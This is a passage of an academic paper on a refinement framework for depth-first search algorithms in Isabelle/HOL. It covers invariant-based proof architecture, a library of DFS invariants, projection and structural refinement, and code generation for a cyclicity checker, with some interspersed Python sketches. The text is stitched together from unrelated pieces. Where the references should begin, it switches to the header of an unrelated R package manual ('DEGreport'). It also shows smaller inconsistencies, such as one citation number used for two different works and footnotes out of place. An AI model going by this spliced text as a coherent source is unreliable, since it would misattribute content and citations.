**Example 5.3.** A finite set can be implemented by a duplicate-free list of its elements. This is described by the following relation:

    ls_rel ≡ {(l, s). set l = s ∧ distinct l}
The select-function from Example 5.2 can be implemented on lists as follows:
    select' l:
      assert l ≠ [];
      x = hd l;
      return (x, tl l)
Again, it is straightforward to show that select' refines select:
    (l, s) ∈ ls_rel ⟹ select' l ≤ ⇓(Id ×r ls_rel) (select s)
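Data refinement can likewise be checked exhaustively on a small universe. In the sketch below (ours, with the result relation taken as identity on the selected element paired with the list/set relation on the remainder), `concretize` plays the role of the concretization function:

```python
import itertools

def concretize(R, m):
    """Concretization on a non-FAIL result: all concrete values whose
    abstract counterpart lies in m. R is a set of (concrete, abstract)
    pairs; m is a set of abstract values."""
    return {c for (c, a) in R if a in m}

# ls_rel on a two-element universe: duplicate-free tuples vs. their sets
univ = (1, 2)
ls_rel = {(l, frozenset(l))
          for n in range(len(univ) + 1)
          for l in itertools.permutations(univ, n)}

def select_abs(s):
    """Abstract select: every way of splitting off one element."""
    return {(x, frozenset(s - {x})) for x in s}

def select_list(l):
    """select' on lists: deterministically take the head."""
    assert l != ()
    return (l[0], l[1:])
```

For every \((l, s) \in \text{ls\_rel}\) with \(l \neq []\), the concrete result of `select_list` relates to some abstract result of `select_abs`, which is the finite content of the refinement statement above on this universe.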
**6. Proof Architecture**
Recall that we have phrased the DFS algorithm as a single loop of the form:
    init; while cond do step
Using the monad of the refinement framework, this is implemented by explicitly threading through the state, i.e.,
    s = init; while (λs. cond s) (λs. step s) s
For better readability, we introduce the convention to omit the state parameter whenever it is clear which state to use.
Properties of the DFS algorithm are shown by establishing invariants, i.e., predicates that hold for all reachable states of the DFS algorithm.
The standard way to establish an invariant is to generalize it to an inductive invariant, and show that it holds for the initial state and is preserved by steps of the algorithm. When using this approach naïvely, we face two problems:

1. The invariant required to prove an algorithm correct is typically quite complicated. Proving it in one go results in big proofs that tend to get unreadable and hard to maintain. Moreover, there are many basic invariants that are used for almost all DFS-based algorithms. These would have to be re-proved for every algorithm, which is contrary to our intention to provide a framework that eliminates redundancy. Thus, we need a solution that allows us to establish invariants incrementally, re-using already established invariants to prove new ones.
2. Our refinement framework allows for failing assertions. If the algorithm may reach a failing assertion, we cannot establish any invariants. Thus we can only establish invariants of the base algorithm under the assumption that the hook functions do not fail. However, we would like to use invariants of the base algorithm to show that the whole algorithm is correct, in particular that the hook functions do not fail. Thus, we need a solution that allows us to establish invariants for the non-failing reachable states only, and a mechanism that later transfers these invariants to the actual algorithm.
In the following, we describe the proof architecture of our DFS framework, which solves these problems. First, we define the operator $\leq_n$ by $m \leq_n m' \equiv m \neq FAIL \rightarrow m \leq m'$. Thus, $m \leq_n \text{spec } \Phi$ means that $m$ either fails or all its possible values satisfy $\Phi$. With this, an inductive invariant of the non-failing part of the algorithm can be conveniently expressed as
$$\text{is\_ind\_invar} P \equiv \text{init} \leq_n \text{spec } P \land \forall s. \text{P } s \land \text{cond } s \rightarrow \text{step } s \leq_n \text{spec } P.$$
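To make the definition concrete, here is a small Python rendering of it (a toy model, not the Isabelle formalization; the `FAIL` marker, the finite state space, and all names are illustrative): a program is a triple `(init, cond, step)`, where `step` maps a state to the set of possible successor states or to `FAIL`, and both conjuncts of `is_ind_invar` are checked by enumeration.

```python
# Toy model of is_ind_invar: check that P holds initially and is
# preserved by every non-failing step, over a finite state space.
FAIL = object()

def is_ind_invar(P, init, cond, step, state_space):
    """init <=_n spec P, and P is preserved by steps from P-and-cond states."""
    if init is not FAIL and not all(P(s) for s in init):
        return False
    for s in state_space:
        if P(s) and cond(s):
            succ = step(s)
            if succ is not FAIL and not all(P(t) for t in succ):
                return False
    return True

# A counter that steps from 0 towards 10.
init = {0}
cond = lambda s: s < 10
step = lambda s: {s + 1}

assert is_ind_invar(lambda s: 0 <= s <= 10, init, cond, step, range(100))
assert not is_ind_invar(lambda s: s < 10, init, cond, step, range(100))
```

The second assertion fails preservation: from the state 9 the step reaches 10, which violates `s < 10`, so that predicate is an invariant of the reachable states but not an *inductive* one.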
It is straightforward to show that there exists a most specific invariant $I$, i.e., an inductive invariant that implies all other inductive invariants:
$$\text{is\_ind\_invar } I \qquad \text{and} \qquad \text{is\_ind\_invar } P \land I\ s \rightarrow P\ s.$$
In order to establish invariants of the algorithm, we show that they are inductive invariants when combined with $I$. This leads to the following rule, which shows consequences of the most specific invariant:
**lemma establish\_invar:**
- assumes $\text{init} \leq_n \text{spec } P$
- assumes $\forall s.\ \text{cond } s \land I\ s \land P\ s \rightarrow \text{step } s \leq_n \text{spec } P$
- shows $I s \Rightarrow P s$
When discharging the proof-obligation for a step, introduced by the second premise of this rule, we may assume $I s$, and thus re-use invariants that we have already proved.
In order to use invariants to show properties of the algorithm, we use the fact that at the end of a loop, the invariant holds and the condition does not:
- $\text{init; while cond do step} \leq_n \text{spec } (\lambda s.\ I\ s \land \neg \text{cond } s)$
Finally, we use the following rule to show that the algorithm does not fail:
**lemma establish\_nofail:**
- assumes $\text{init} \neq \text{FAIL}$
- assumes $\forall s.\ \text{cond } s \land I\ s \rightarrow \text{step } s \neq \text{FAIL}$
- shows $\text{init; while } \text{cond do step} \neq \text{FAIL}$
To simplify re-using and combining of already established invariants, we define a locale $\text{DFS\_invar}$, which fixes a state $s$ and assumes that the most specific invariant holds on $s$. Whenever we have established an invariant $P$, we also prove $P s$ inside this locale. In a proof to establish an invariant, we may interpret the locale, to have the already established invariants available.
---
**Example 6.1.** In our parameterized DFS framework, we provide a version of $\text{establish\_invar}$ that splits over the different cases of $\text{step}$, and is focused on the hook functions:
**lemma establish\_invar:**
- assumes init: on_init $\leq_n$ spec (λx. P (empty_state x))
- assumes new_root: ∀v0 s s'. pre_on_new_root v0 s s' → on_new_root v0 s' $\leq_n$ spec (λx. P (s'⦇more := x⦈))
- assumes finish: ∀u s s'. pre_on_finish u s s' → on_finish u s' $\leq_n$ spec (λx. P (s'⦇more := x⦈))
- assumes cross_edge: ∀u v s s'. pre_on_cross_edge u v s s' → on_cross_edge u v s' $\leq_n$ spec (λx. P (s'⦇more := x⦈))
- assumes back_edge: ∀u v s s'. pre_on_back_edge u v s s' → on_back_edge u v s' $\leq_n$ spec (λx. P (s'⦇more := x⦈))
- assumes discover: ∀u v s s'. pre_on_discover u v s s' → on_discover u v s' $\leq_n$ spec (λx. P (s'⦇more := x⦈))
shows $\text{is\_invar } P$
Here, is_invar P states that P is an invariant, s'⦇more := x⦈ is the state s' with the extension part updated to x, and the pre_-predicates define the preconditions for the calls to the hook functions. For example, we have

- pre_on_finish u s s' ≡ DFS_invar s ∧ cond s
- ∧ stack s ≠ [] ∧ u = hd (stack s)
- ∧ pending s `` {u} = {} ∧ s' = finish u s

That is, the invariant holds on state s, u is the topmost node on the stack, s has no more pending edges from u, and the state s' emerged from s by executing the finish operation on the base DFS state.
A typical proof of an invariant $P$ has the following structure:
```plaintext
lemma P_invar: is_invar P
proof (induction rule: establish_invar)
  case (discover u v s s')
  then interpret DFS_invar s by simp
  show on_discover u v s' ≤_n spec (λx. P (s'⦇more := x⦈))
next
  ...
qed

lemmas (in DFS_invar) P = P_invar[THEN xfer_invar]
```
The proof of the first lemma illustrates how the proof language Isar is used to write down a human-readable proof. The different cases that we have to handle correspond to the assumptions of the lemma establish\_invar. The interpret command makes available all definitions and facts from the locale DFS\_invar, which can then be used to show the statement. The second lemma just transfers the invariant to the DFS\_invar locale, in which the fact $P s$ is now available by the name $P$.
Note that this Isar proof scheme is only suited for invariants with complex proofs. Simpler invariant proofs can often be stated on a single line. For example, finiteness of the discovered edges is proved as follows:
**lemma** is_invar (λs. finite (edges s))
**by** (induction rule: establish_invar) auto
---
**6.1 Library of Invariants**
In the previous section we have described the proof architecture, which enables us to establish invariants of the depth-first search algorithm. In this section, we show how this architecture is put to use.
We define an abstract DFS algorithm, which is an instance of the generic architecture presented in Section 4. Its state contains discovery and finished times of nodes, and a search forest with additional back and cross edges.
The abstract basic operations (e.g., finish, get_pending) are defined accordingly, fulfilling the requirements of the generic framework.
Based on this, we provide a variety of invariants, which use the information in the state at different levels of detail. Note that these invariants do not depend on the extension part of the state, and thus can be proven independently of the hook functions, which only update the extension part. Further note that we present them as they occur in the locale DFS_invar, which fixes the state and assumes that the most specific invariant holds (cf. Section 6).
For the sets dom \( \delta \) of discovered and dom \( \varphi \) of finished nodes, we prove, among others, the following properties:
**Lemma stack_set_def:** set stack = dom \( \delta \) – dom \( \varphi \)
**Lemma finished_closed:** \( E \text{``} \text{dom}\ \varphi \subseteq \text{dom}\ \delta \)
**Lemma nc_finished_eq_reachable:**
\( \neg \text{cond} \land \neg \text{is\_break} \implies \text{dom}\ \varphi = E^* \text{``} V0 \)
The first lemma states that the nodes on the stack are exactly those that have already been discovered, but not yet finished. The second lemma states that edges from finished nodes lead to discovered nodes, and the third lemma states that the finished nodes are exactly the nodes reachable from \( \text{V0} \) when the algorithm terminates without being interrupted.
We also prove more sophisticated properties found in standard textbooks (e.g., [2], pp. 606–608), like the Parenthesis Theorem (the discovered/finished intervals of two nodes are either disjoint or the one is contained in the other, but there is no overlap) or the White-Path Theorem (a node \( w \) is reachable in the search tree from a node \( v \) iff there is a white path from \( v \) to \( w \), i.e., a path whose nodes are all not yet discovered when \( v \) is).
**Lemma parenthesis:**
assumes \( v \in \text{dom} \ \varphi \) and \( w \in \text{dom} \ \varphi \)
and \( \delta v < \delta w \)
shows \( (\ast \text{disjoint} \ast) \ \varphi v < \delta w \lor (\ast v \text{ contains } w \ast) \ \varphi w < \varphi v \)
**Lemma white_path:**
assumes \( v \in E^* \text{``} V0 \) and \( w \in E^* \text{``} V0 \)
and \( \neg \text{cond} \land \neg \text{is_break} \)
shows white_path \( v w \iff (v,w) \in \text{tree}^* \)
The Parenthesis Theorem is important to reason about paths in the search tree, as it allows us to gain insights just by looking at the timestamps:
**Lemma tree_path_iff_parenthesis:**
assumes \( v \in \text{dom} \ \varphi \) and \( w \in \text{dom} \ \varphi \)
shows \( (v,w) \in \text{tree}^* \iff \delta v < \delta w \land \varphi v > \varphi w \)
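The interplay of discovery and finish times can be illustrated with a plain Python DFS (an informal sketch with illustrative names, not the framework's algorithm): recording δ and φ on a small diamond graph, every pair of timestamp intervals is nested or disjoint, exactly as the Parenthesis Theorem predicts.

```python
# Record discovery (delta) and finish (phi) times during an ordinary DFS.
def dfs_times(graph, roots):
    delta, phi, clock = {}, {}, [0]
    def visit(u):
        delta[u] = clock[0]; clock[0] += 1
        for v in graph.get(u, []):
            if v not in delta:
                visit(v)
        phi[u] = clock[0]; clock[0] += 1
    for r in roots:
        if r not in delta:
            visit(r)
    return delta, phi

graph = {0: [1, 2], 1: [3], 2: [3], 3: []}   # diamond-shaped DAG
delta, phi = dfs_times(graph, [0])

# Parenthesis property: intervals are nested or disjoint, never overlapping.
for v in delta:
    for w in delta:
        if delta[v] < delta[w]:
            assert phi[v] < delta[w] or phi[w] < phi[v]
```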
From the location of two nodes in the search tree, we can deduce several properties of those nodes (e.g., the \( \rightarrow \) direction of tree_path_iff_parenthesis). This can be used, for example, to show properties of back edges, as
**Lemma back_edge_impl_tree_path:**
\[
[(v,w) \in \text{back\_edges}; v \neq w] \implies (w,v) \in \text{tree}^*.
\]
It can also be used to establish invariants about the root of a strongly connected component, i.e., the node of an SCC with the highest position in the tree, because
**Lemma scc_root_scc_tree_trancl:**
\[
[\text{scc\_root } v\ scc;\ x \in scc;\ x \in \text{dom}\ \delta;\ x \neq v] \implies (v,x) \in \text{tree}^+.
\]
Utilizing the knowledge about the search tree, we can then show that a node of an SCC is its root iff it has the minimum discovery time of the SCC. This is an important fact, for example in the proof of Tarjan’s SCC Algorithm.
**Example 6.2.** The notion of cycles in the set of reachable edges is independent of any DFS instantiation. Therefore we can provide invariants about the (a)cyclicity of those edges in the general library, the most important one linking acyclicity to the existence of back edges:
**Lemma cycle_iff_back_edges:**
acyclic edges \( \iff \text{back_edges} = \{\} \)
Here, edges is the union of all tree, cross, and back edges.
The \( \implies \) direction follows, by contraposition, as an obvious corollary of the lemma back_edge_impl_tree_path shown above. The \( \impliedby \) direction follows from the fact that acyclic (tree \( \cup \) cross_edges), the proof of which uses the Parenthesis Theorem.
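The content of the lemma can be mirrored by an ordinary Python DFS sketch (illustrative names; GRAY marks nodes on the current recursion stack): a cycle among the reachable nodes exists exactly when the search meets a gray successor, i.e., finds a back edge.

```python
# Cycle detection via back edges: an edge into a GRAY (on-stack) node
# closes a cycle, since a tree path leads back from it to the source.
def has_back_edge(graph, roots):
    WHITE, GRAY, BLACK = 0, 1, 2
    color = {}
    def visit(u):
        color[u] = GRAY
        for v in graph.get(u, []):
            if color.get(v, WHITE) == GRAY:                  # back edge
                return True
            if color.get(v, WHITE) == WHITE and visit(v):
                return True
        color[u] = BLACK                                     # finished
        return False
    return any(color.get(r, WHITE) == WHITE and visit(r) for r in roots)

assert not has_back_edge({0: [1, 2], 1: [3], 2: [3], 3: []}, [0])  # DAG
assert has_back_edge({0: [1], 1: [2], 2: [0]}, [0])                # 3-cycle
```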
Moreover, we need the fact that at the end of the search edges is the set of all reachable edges:
**Lemma nc_edges_covered:**
assumes \( \neg \text{cond} \) and \( \neg \text{is_break} \)
shows \( E \cap (E^* \text{``} V0) \times UNIV = \text{edges} \)
With those facts from the library, we recall the definition of the cyclicity checker in our framework as presented in Example 4.1. Let cyc be that instantiation.
As the cyc flag is set when a back edge is encountered, the following invariant is easily proved:
**Lemma i_cyc_eq_back:**
is_invar (λs. cyc s \( \iff \) back_edges s ≠ {})
apply (induct rule: establish_invar)
apply (simp_all add: cond_def cong: cyc_more_cong)
apply (simp add: empty_state_def)
done
This happens to be the only invariant that needs to be shown for the correctness proof. Using the invariants mentioned above, we easily get the following lemma inside the locale DFS_invar, i.e., under the assumption \( I s \):
**Lemma (in DFS_invar) cyc_correct_aux:**
assumes \( \neg \text{cond} s \)
shows \( \text{cyc } s \iff \neg \text{acyclic} (E \cap (E^* \text{``} V0) \times \text{UNIV}) \)
Intuitively, this lemma states that the cyc flag is equivalent to the existence of a reachable cycle upon termination of the algorithm. Finally, we gain the correctness lemma of the cyclicity checker as an easy consequence:
\[
\text{cycc } E\ V0 \leq \text{spec } (\lambda s.\ \text{cyc } s \iff \neg \text{acyclic} (E \cap (E^* \text{``} V0) \times \text{UNIV})).
\]
7. Refinement
In Section 6, we have described the abstract DFS framework. We phrased the algorithm as a step-function on a state that contained detailed information. In order to implement an actual DFS algorithm, most of this information is typically not required, and the required information should be represented by efficient data structures. Moreover, we want to choose between different implementation styles, like recursive or tail-recursive.
For this, our framework splits the refinement process into three phases: In the projection phase, we get rid of unnecessary information in the state. In the structural refinement phase, we choose the implementation style. Finally, in the code generation phase, we choose efficient data structures to represent the state, and extract executable code from the formalization.
Although the refinements are applied sequentially, our design keeps the phases as separated as possible, to avoid a cubic blowup of the formalization in the number of different states, implementation styles and efficient data structures.
7.1 Projection
To get a version of the algorithm over a state that only contains the necessary information, we use data refinement: We define a relation between the original abstract state and the reduced concrete state, as well as the basic operations on the concrete state. Then, we show that the operations on the concrete state refine their abstract counterparts. Using the refinement calculus provided by the Isabelle Refinement Framework, we easily lift this result to show that the concrete algorithm refines the abstract one.
In order to be modular w.r.t. the hook operations, we provide a set of standard implementations together with their refinement proofs, assuming that we have a valid refinement for the hooks. As for the abstract state, we also use extensible records for the concrete state. Thus, we obtain templates for concrete implementations, which are instantiated with a concrete data structure for the extension part of the state, a set of concrete hook operations, and refinement theorems for them.
Example 7.1. For many applications, such as the cyclicity checker from Example 4.1, it suffices to keep track of the stack, the pending edges, and the set of discovered nodes. We define a state type
```plaintext
record 'v simple_state =
  stack :: ('v × 'v set) list
  on_stack :: 'v set
  visited :: 'v set
```
and a corresponding refinement relation
```plaintext
(s', s) ∈ RS ≡
  stack s' = map (λu. (u, pending s `` {u})) (stack s) ∧
  on_stack s' = set (stack s) ∧
  visited s' = dom (δ s) ∧
  (more s', more s) ∈ X
```
Note that we store the pending edges as part of the stack, and provide an extra field on_stack that stores the set of nodes on the stack. This is done with the implementation in mind, where cross and back edges are identified by a lookup in an efficient set data structure and the stack may be projected away when using a recursive implementation. Moreover, we parameterize the refinement relation with a relation X for the extension state.
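As an informal illustration of RS, the following Python sketch (dictionary-based states with illustrative field names, identity on the extension part) checks the relation between a hypothetical abstract state and its simple_state counterpart.

```python
# Check the refinement relation: the concrete stack pairs each node with
# its pending edges, on_stack mirrors the stack as a set, and visited
# mirrors the domain of the abstract discovery map delta.
def in_RS(concrete, abstract):
    return (concrete["stack"] == [(u, {v for (x, v) in abstract["pending"] if x == u})
                                  for u in abstract["stack"]]
            and concrete["on_stack"] == set(abstract["stack"])
            and concrete["visited"] == set(abstract["delta"]))

abstract = {"stack": [2, 0],             # node 2 on top
            "pending": {(2, 3), (0, 1)},
            "delta": {0: 0, 2: 1}}       # discovery times
concrete = {"stack": [(2, {3}), (0, {1})],
            "on_stack": {0, 2},
            "visited": {0, 2}}
assert in_RS(concrete, abstract)
```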
Next, we define a set of concrete operations. For example, the concrete discover operation is defined as:
```plaintext
discover' u v:
  stack := (v, E `` {v}) # stack
  on_stack := insert v on_stack
  visited := insert v visited
```
It is straightforward to show that discover' refines the abstract discover-operation:
```plaintext
lemma discover_refine:
  assumes (s', s) ∈ RS
  shows discover' u v s' ≤ ⇓RS (discover u v s)
```
Assuming refinement of all hook operations, we get refinement of the abstract algorithm:
```plaintext
lemma refine:
  assumes on_init' ≤ ⇓X on_init
  and ∀v0 s s'. [pre_on_new_root v0 s s'; (s', s) ∈ RS]
        ⟹ on_new_root' v0 s' ≤ ⇓X (on_new_root v0 s)
  and ...
  shows DFS' ≤ ⇓RS DFS
```
where DFS' is the DFS-algorithm over the concrete operations.
We also provide further implementations, which both require the hooks for back and cross edges to have no effect on the state. Thus the corresponding cases can be collapsed and there is no need to implement the on_stack set. As an additional optimization we pre-initialize the set of visited nodes to simulate a search with some nodes excluded. As an example, this is used in the inner DFS of the nested DFS algorithm (cf. Example 4.2).
For the cyclicity checker, we define the concrete state by extending the simple_state record:
```plaintext
record 'v cycc_state_impl = 'v simple_state +
cyc :: bool
```
The extension state will be refined by identity, i.e., the refinement relation for the concrete state is RS. We also define a set of concrete hook operations (which look exactly like their abstract counterparts)
```plaintext
on_init_impl: cyc := False
is_break_impl: cyc
on_back_edge_impl u v: cyc := True
```
It is trivial to show that these refine their abstract counterparts w.r.t. RS. Once this is done, the DFS framework gives us a cyclicity checker over the concrete state, and a refinement theorem:
```plaintext
cycc_impl ≤⇓ RS cycc
```
7.2 Structural Refinement
Another aspect of refinement is the structure of the algorithm. Up to now, we have represented the algorithm as a while-loop over a step-function. This representation greatly simplifies the proof architecture, however, it is not how one would implement a concrete DFS algorithm. We provide two standard implementations: A tail-recursive one and a recursive one. The tail-recursive implementation uses only while and foreach loops, maintaining the stack explicitly, while the recursive implementation uses a recursive function and requires no explicit stack.
We are interested in making the structural refinement of the algorithm independent of the projection, such that we can combine different structural refinements with different projections, without doing a quadratic number of refinement proofs. For this purpose we formalize the structural refinements in the generic setting (cf. Section 4) first. Depending on the desired structure, we have to add some minimal assumptions on the state and generic operations, as will be detailed below. The resulting generic algorithms are then instantiated by the concrete state and operations from the projection phase, thereby discharging the additional assumptions.
The following listing depicts the pseudocode for the tail-recursive implementation, using the basic DFS operations:
4 This is an optimization that saves one membership query per node.
5 For example, checking the loop condition would require iteration over all root nodes each time.
```plaintext
tailrec_DFS:
  init; on_init
  foreach v0 in V0 do
    if is_break then break
    if not discovered v0 then
      new_root v0; on_new_root v0
      while (stack ≠ [] ∧ ¬ is_break) do
        (u, V) = get_pending
        case V of
          None ⇒ finish u; on_finish u
        | Some v ⇒
            if discovered v then
              if finished v then
                cross_edge u v; on_cross_edge u v
              else
                back_edge u v; on_back_edge u v
            else
              discover u v; on_discover u v
```
This implementation iterates over all root nodes. For each root node, it calls new_root and then executes steps of the original algorithm until the stack is empty again. Note that we effectively replace the arbitrary choice of the next root node by the outer foreach-loop. In order for this implementation to be a refinement of the original algorithm, we have to assume that 1) the stack is initially empty, such that we can start with choosing a root node, and 2) the same root node cannot be chosen twice, so that we are actually finished when we have iterated over all root nodes. In order to ensure 2), we assume that new_root sets the node to discovered, and no operation can decrease the set of discovered nodes.
With these assumptions, we can use the infrastructure of the Isabelle Refinement Framework to show that the algorithm tailrec_DFS refines the original DFS.
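For intuition, the tail-recursive scheme can be rendered as an executable Python sketch in which each hook call merely appends an event to a trace; all names here are illustrative, not the framework's constants.

```python
# Tail-recursive DFS with an explicit stack of (node, pending edges);
# hook calls are replaced by events appended to a trace.
def tailrec_dfs(graph, roots):
    events, discovered, finished = [], set(), set()
    for v0 in roots:
        if v0 in discovered:
            continue
        events.append(("new_root", v0))
        discovered.add(v0)
        stack = [(v0, list(graph.get(v0, [])))]
        while stack:
            u, pending = stack[-1]
            if not pending:                      # get_pending returned None
                events.append(("finish", u))
                finished.add(u)
                stack.pop()
                continue
            v = pending.pop(0)
            if v in discovered:
                kind = "cross_edge" if v in finished else "back_edge"
                events.append((kind, u, v))
            else:
                events.append(("discover", u, v))
                discovered.add(v)
                stack.append((v, list(graph.get(v, []))))
    return events

trace = tailrec_dfs({0: [1, 2], 1: [2], 2: [0]}, [0])
assert ("back_edge", 2, 0) in trace and ("cross_edge", 0, 2) in trace
```

On this graph the edge 2→0 is classified as a back edge (0 is still on the stack) and 0→2 as a cross edge (2 is already finished when it is examined).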
The next listing depicts the pseudocode for the recursive implementation:
```plaintext
recursive_DFS:
  init; on_init
  foreach v0 in V0 do
    if is_break then break
    if not discovered v0 then
      new_root v0; on_new_root v0
      inner_dfs v0

inner_dfs u:
  foreach v in E `` {u} do
    if is_break then break
    choose_pending u (Some v)
    if discovered v then
      if finished v then
        cross_edge u v; on_cross_edge u v
      else
        back_edge u v; on_back_edge u v
    else
      discover u v; on_discover u v
      if ¬ is_break then inner_dfs v
  choose_pending u None
  finish u; on_finish u
```
As in the tail-recursive implementation, we iterate over all root nodes. For each root node, we call the recursive function inner_dfs. Intuitively, this function handles a newly discovered node: It iterates over its successors, and for each successor, it decides whether it induces a cross or back edge, or leads to a newly discovered node. In the latter case, inner_dfs is called recursively on this newly discovered node. Finally, if all successor nodes have been processed, the node is finished.
Intuitively, this implementation replaces the explicit stack of the original algorithm by recursion.
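The recursive variant admits the same kind of executable sketch: inner_dfs becomes an ordinary recursive Python function, with the hooks again replaced by trace events (all names illustrative).

```python
# Recursive DFS: the explicit stack is replaced by the call stack of
# inner_dfs; hook calls are replaced by events appended to a trace.
def recursive_dfs(graph, roots):
    events, discovered, finished = [], set(), set()
    def inner_dfs(u):
        for v in graph.get(u, []):
            if v in discovered:
                kind = "cross_edge" if v in finished else "back_edge"
                events.append((kind, u, v))
            else:
                events.append(("discover", u, v))
                discovered.add(v)
                inner_dfs(v)
        events.append(("finish", u))
        finished.add(u)
    for v0 in roots:
        if v0 not in discovered:
            events.append(("new_root", v0))
            discovered.add(v0)
            inner_dfs(v0)
    return events

trace = recursive_dfs({0: [1, 2], 1: [2], 2: [0]}, [0])
assert ("back_edge", 2, 0) in trace and trace[-1] == ("finish", 0)
```

On the same input graph, this sketch emits the same event sequence as a stack-based formulation, which is exactly the refinement relationship the framework proves once and for all.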
Apart from the assumptions 1) and 2) from tailrec_DFS, we need some additional assumptions to show that this implementation refines the original algorithm: 3) The operation new_root v0 initializes the stack to only contain v0, and the pending edges to all outgoing edges of v0; the operation discover u v pushes v on the stack and adds v's outgoing edges to the set of pending edges; the finish operation pops the topmost node from the stack. 4) The get_pending operation of the original algorithm must have the form of selecting a pending edge from the top of the stack, if any, and then calling the operation choose_pending for this edge, where choose_pending removes the edge from the set of pending edges.
With these assumptions we show that recursive_DFS refines the original DFS algorithm. Note that the refinement proof requires the state to contain a stack, which is however not used by the recursive algorithm. Provided that the parameterization does not require a stack either, we can add an additional data refinement step to remove the stack. For convenience, we combine this step with the automatic refinement to efficient data structures, which is described below.
Note that these assumptions are natural for any set of operations on a DFS state. The advantage of this formulation is its independence from the actual operations. Thus, the same formalization can be used to derive implementations for all states and corresponding operations, which reduces redundancies, and even makes proofs more tractable, as it abstracts from the details of a concrete data structure to its essential properties.
Example 7.2. Recall the simple state from Example 7.1. The simple implementation satisfies all assumptions required for the tail-recursive and recursive implementation, independent of the parameterization. Thus, upon refining an algorithm to simple_state, we automatically get a tail-recursive and a recursive implementation, together with their refinement theorems. In case of the cyclicity checker, we get:
\[ \text{cycc\_tr\_impl} \leq \Downarrow RS\ \text{cycc} \quad \text{and} \quad \text{cycc\_rec\_impl} \leq \Downarrow RS\ \text{cycc} \]
### 7.3 Code Generation
After projection and structural refinement have been done, the algorithm is still described in terms of quite abstract data structures like sets and lists. In a last refinement step, these are refined to efficiently executable data structures, like hash-tables and array-lists. To this end, the Isabelle Collections Framework [10] provides a large library of efficient data structures and generic algorithms, and the Autoref-tool [2] provides a mechanism to automatically synthesize an efficient implementation and a refinement theorem, guided by user-configurable heuristics.
Note that we do this last refinement step only after we have fully instantiated the DFS-scheme. This has the advantage that we can choose the most adequate data structures for the actual algorithm. The fact that the refinements for the basic DFS operations are performed redundantly for each actual algorithm does not result in larger formalizations, as it is done automatically.
Example 7.3. In order to generate an executable cyclicity checker, we start with the constant cycc_tr_impl, which is the tail-recursive version of the cyclicity checker, using the simple_state (cf. Example 7.2). The state consists of a stack, an on-stack set, a visited set, and the cyc flag. Based on this, we define the cyclicity checker by
```plaintext
cycc_checker E V0 ≡ do {
  s ← cycc_tr_impl E V0;
  return (cyc s)
}
```
To generate executable code, we first have to write a few lines of canonical boilerplate to set up Autoref to work with the extension state of the cyclicity checker. The executable version of the algorithm is then synthesized by the following Isabelle commands:
```plaintext
schematic_lemma cycc_impl:
  fixes V0 :: "('v::hashable) set" and E :: "('v × 'v) set"
  defines V ≡ Id :: ('v × 'v) set
  assumes [unfolded V_def, autoref_rules]:
    (succi, E) ∈ ⟨V⟩slg_rel
    (V0i, V0) ∈ ⟨V⟩list_set_rel
  notes [unfolded V_def, autoref_tyrel] =
    TYRELI[where R = ⟨V⟩dfst_abs_rel]
    TYRELI[where R = ⟨V × ⟨V⟩list_set_rel⟩ras_rel]
  shows nres_of (?c::'v dres) ≤ ⇓?R (cycc_checker E V0)
  unfolding cycc_tr_impl_def[abs_def] cycc_checker_def
  by autoref_monadic

concrete_definition cycc_exec uses cycc_impl
export_code cycc_exec in SML
```
The first command uses the Autoref-tool to synthesize a refinement. The fixes line declares the types of the abstract parameters, restricting the node type to be of the hashable type class. The next line defines a shortcut for the implementation relation for nodes, which is fixed to identity here. The assumptions declare the refinement of the abstract to the concrete parameters: The edges are implemented by a successor function, using the relator slg_rel, which is provided by the CAVA automata library [8]. The set of start nodes is implemented by a duplication-free list, using the relator list_set_rel from the Isabelle Collections Framework, which is roughly the same as ls_rel from Example 5.3.
Finally, the notes-part gives some hints to the heuristics: The first hint causes sets of nodes to be implemented by hash tables. This hint matches the on-stack and visited fields of the state. The second hint matches the stack field, and causes it to be implemented by an array-list, where the sets of pending nodes are implemented by duplication-free lists of their elements. Again, the required data types and their relators dfst_abs_rel and ras_rel are provided by the Isabelle Collections Framework.
Ultimately, the autoref_monadic method generates a refinement theorem of the shape indicated by the shows-part, where ?c is replaced by the concrete algorithm, and ?R is replaced by the refinement relation for the result. The second command defines a new constant for the synthesized algorithm, and also provides a refinement theorem with the constant folded. As the generated algorithm only uses executable data structures, the code generator of Isabelle/HOL [9] can be used to generate efficient Standard ML code.
8. Conclusion and Future Work
In this paper, we have presented a framework that supports a step-wise refinement development approach of DFS-based algorithms. On the abstract level, we have a generic formalization of DFS, which is parameterized by hook functions that operate on an opaque extension state. Properties of the algorithm are proved via invariants.
To establish new invariants, only their preservation by the hook functions has to be shown. Moreover, invariants can be established incrementally, i.e., already proven invariants can be used when establishing new ones. To this end, our framework provides a large library of parametrization-independent standard invariants, which greatly simplify the correctness proofs of actual instantiations of the framework. For example, the cyclicity checker (cf. Example 4.1) required only one additional invariant with a straightforward 3-line proof.
Furthermore, the framework allows us to refine both data structures and algorithm structure, where the latter is (in general) independent of the actual instantiation. The data refinement, as shown in this paper, is the prerequisite for the aforementioned library of invariants, as it allows us to project a detailed abstract state to a small concrete state. This way, it is possible to have proof-supporting information without the necessity to actually gather it at runtime.
The framework supports various default concrete states. Using them only requires a refinement proof of the hook-functions.
To show the usability of the presented framework, we have formalized several examples from easy (Cyclicity Checker) to more advanced (Tarjan’s SCC algorithm). In this paper, we presented the development of the Cyclicity Checker and the approach for formalizing a nested DFS algorithm.
The main contribution of this paper is the DFS-framework itself, and its design approach, which is not limited to DFS algorithms. The first general design principle is the technique of incrementally establishing invariants, which allows us to provide a standard library of invariants, which are independent of the actual instantiation. In Isabelle/HOL, this technique is elegantly implemented via locales.
The second general principle is to provide an algorithm over a detailed state at the abstract level, and then use refinement to project away the unused parts of the state for the implementation. This allows us to have a common abstract base for all instantiations.
Finally, we provide different implementation styles for the same algorithm, in a way that is independent of the concrete data structures, only making some basic assumptions. This allows us to decouple the data refinement and the structural refinement.
8.1 Future Work
An interesting direction of future work is to extend the framework to more general classes of algorithms. For example, when dropping the restriction that pending edges need to come from the top of the stack, one gets a general class of search algorithms, also including breadth-first search, and best-first search.
Currently, our framework only supports an invariant-based proof style. However, in many textbooks, proofs about DFS algorithms are presented by arguing over the already completed search forest. This proof style can be integrated in our framework by (conceptually) splitting the DFS algorithm into two phases: The first phase creates the DFS forest, only using the base state, while the second phase recurses over the created forest and executes the hook functions. It remains future work to elaborate this approach and explore whether it results in more elegant proofs.
References
Package ‘DEGreport’
April 3, 2024
Version 1.38.5
Date 2023-12-06
Type Package
Title Report of DEG analysis
